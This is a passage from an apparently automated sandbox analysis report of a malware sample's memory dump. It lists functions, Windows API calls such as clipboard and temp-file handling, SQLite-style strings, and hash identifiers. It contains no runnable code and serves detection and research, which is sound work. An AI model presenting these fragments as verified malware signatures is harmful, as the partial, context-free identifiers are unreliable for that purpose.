                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                  Function 0044081D Relevance: 11.1, APIs: 2, Strings: 5, Instructions: 605COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: 8$P$P$at most %d tables in a join$cannot use index: %s
                                                                                                                                                                                  • API String ID: 2221118986-3931078971
                                                                                                                                                                                  • Opcode ID: 10b8dfbac9ea5f296623b2e36d2bbafb82830fb2f1b12c01d525242f931228d1
                                                                                                                                                                                  • Instruction ID: a4a7f51c7708a2cf2cee828f321a28954037f43b08d1d975c1b10d1e328082e6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 10b8dfbac9ea5f296623b2e36d2bbafb82830fb2f1b12c01d525242f931228d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27425171D00219DFEF14CF95C881AEEBBB1FF08314F14855AEA15AB251D738A9A1CF98
                                                                                                                                                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                  Function 0043610D Relevance: 10.0, APIs: 2, Strings: 4, Instructions: 1046COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • table %S has no column named %s, xrefs: 00436578
                                                                                                                                                                                  • rows inserted, xrefs: 00436C5F
                                                                                                                                                                                  • %d values for %d columns, xrefs: 004364AA
                                                                                                                                                                                  • table %S has %d columns but %d values were supplied, xrefs: 0043648A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: %d values for %d columns$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                  • API String ID: 2221118986-2709362559
                                                                                                                                                                                  • Opcode ID: 4c8ab9cd607e8854f9e547d994437d4687ff29f7313e8e17e2a59fb75ba467f6
                                                                                                                                                                                  • Instruction ID: 9c125d797f7739dd18a706fcf9805d15b4108fee604c20040dca07a78b4adc45
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c8ab9cd607e8854f9e547d994437d4687ff29f7313e8e17e2a59fb75ba467f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 27929071E0021AFFDF10DF95C881BAEBBB1EF08314F15905AE905A7281D739AE51CB99
                                                                                                                                                                                  Function 0043C560 Relevance: 6.9, APIs: 2, Strings: 2, Instructions: 880COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: no such column: %s$rows updated
                                                                                                                                                                                  • API String ID: 2221118986-885832449
                                                                                                                                                                                  • Opcode ID: f7ae896b199c8f3835dbc7747b670471d9df52f336ae7a6ba2c658ca5c2830cb
                                                                                                                                                                                  • Instruction ID: 7dcecc785416030557bf3e65fdb184edeeac1647f375ce5d724b37e86bd915e6
                                                                                                                                                                                  • Opcode Fuzzy Hash: f7ae896b199c8f3835dbc7747b670471d9df52f336ae7a6ba2c658ca5c2830cb
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB728871608301AFDB10DF19C881A1BBBE1FF88718F04581EF995A7292D739E951CF96
                                                                                                                                                                                  Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2633007058-0
                                                                                                                                                                                  • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                  • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                  Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 00407082
                                                                                                                                                                                    • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2037443186-0
                                                                                                                                                                                  • Opcode ID: 80c0924e07d809e6707357135025925db21493fae5091c55bba71e6fa9b8d5f3
                                                                                                                                                                                  • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80c0924e07d809e6707357135025925db21493fae5091c55bba71e6fa9b8d5f3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                  Function 00407AEB Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: >PD$>PD
                                                                                                                                                                                  • API String ID: 0-241360673
                                                                                                                                                                                  • Opcode ID: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                                  • Instruction ID: 8e2198200500fa0fc3bc88275214576e19b26caf2554f569e41e4ab64c40c239
                                                                                                                                                                                  • Opcode Fuzzy Hash: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B81D630D091E58FDB0A8B7D88901BDFFF4EF9A20075442AED8D2E7346C6744A11CBA1
                                                                                                                                                                                  Function 004079EE Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: UUUU$g|@
                                                                                                                                                                                  • API String ID: 0-841461634
                                                                                                                                                                                  • Opcode ID: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                                  • Instruction ID: 2d8d9101cd04074a5c169b043e39b4a3b006c2ce9d561f0fe2de225ae1ad389f
                                                                                                                                                                                  • Opcode Fuzzy Hash: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA214C327745150BF39CE93D8C1376B62D2DBC8254B18CA3EA6A6C32C1EC6CE9138285
                                                                                                                                                                                  Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                  Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                  Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                  Function 00414957 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: UUUU
                                                                                                                                                                                  • API String ID: 0-1798160573
                                                                                                                                                                                  • Opcode ID: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                                  • Instruction ID: 031174199a2b1a8cd9c643e612bfbadf4fe973dd8768dd983b5f488536bda3ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4451E233F208600BE74CCA6DCC663692A9397C9350B1E827DDA93D73C6DDB8D912D284
                                                                                                                                                                                  Function 0044D6C0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (D8
                                                                                                                                                                                  • API String ID: 0-3292100582
                                                                                                                                                                                  • Opcode ID: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                                  • Instruction ID: b71c20539f751f79200ae51b58374c03269679265288fab777333ac0774f48a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3641441510DBD19EC326CB7D4890496FFE15EB6001748CA8EE4E987B83C158F658D7B2
                                                                                                                                                                                  Function 00412AA9 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                                                                                                                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                                                                                                                  Function 0044B870 Relevance: .4, Instructions: 405COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                                  • Instruction ID: 7d9bfc9c0f16f1db2f1641295165e9d5c4cc4fabe66290bd88ea3126be947770
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 79027D719245F08EE359CF3F8454922BFE2AFCD21134BC2EAD8985F267C2759812CB94
                                                                                                                                                                                  Function 00446D30 Relevance: .4, Instructions: 395COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                                  • Instruction ID: 8e52665ec80593729d0e137496ce0ecfadfbe33a5de6fc479c009b4a0482c98f
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF1AD75A093448FE355DF2AC89066BF7E2EFC8300F55892CE5C98735AD634E90ACB46
                                                                                                                                                                                  Function 00446D8B Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                                  • Instruction ID: 333d6665b213bbb0b2ffe7480c8a97369f7725c8c3b7ff4245839d8e70af8f4c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCF1AE75A093448FE355DF2AC89066BF7E2EFC8300F95892CE5C687356D634E90ACB46
                                                                                                                                                                                  Function 0044AA80 Relevance: .4, Instructions: 368COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                                  • Instruction ID: 6d69576c35898859ca8d02efc530e7c6766c76f2b8aabf7fdbce863400c080a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF15B325087928FE300CF2ADC9012ABBE3EFC9202F5D866DD6951B697C634F516CB95
                                                                                                                                                                                  Function 0044B040 Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                                  • Instruction ID: 40919babecf7e48beddfee2e0cc32287ff98735fe93911287fdb93ed5d1816d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF17A325087928FE304CF2AE89112AFBE2EFC9201F4D8679D69507793C634F521CB96
                                                                                                                                                                                  Function 0040755A Relevance: .4, Instructions: 350COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                                  • Instruction ID: adc93f76a53c8e047bf109f201bc7ef7b47700f57dd2e643460dcd4bbcc33c52
                                                                                                                                                                                  • Opcode Fuzzy Hash: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD10277E107118BD754CFAAFD8010A7363BB9E311B5B8261CA146736AD2B4BA13DAC4
                                                                                                                                                                                  Function 00404C76 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                                  • Instruction ID: 9e132a6a99c217a0d654eab39c971d31e6f6fb31db3c9ae67be1c5f399a16f42
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3A19F77BA0B0907E31849EAACC6394B68397D4315F2E423DCB74C73D2E9FD99168294
                                                                                                                                                                                  Function 00416D72 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                                                                                                                  • Instruction ID: b5a75dcfa354664a12c4438d09bdc6ab1492452f04355958c3e9fdee34c44c91
                                                                                                                                                                                  • Opcode Fuzzy Hash: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
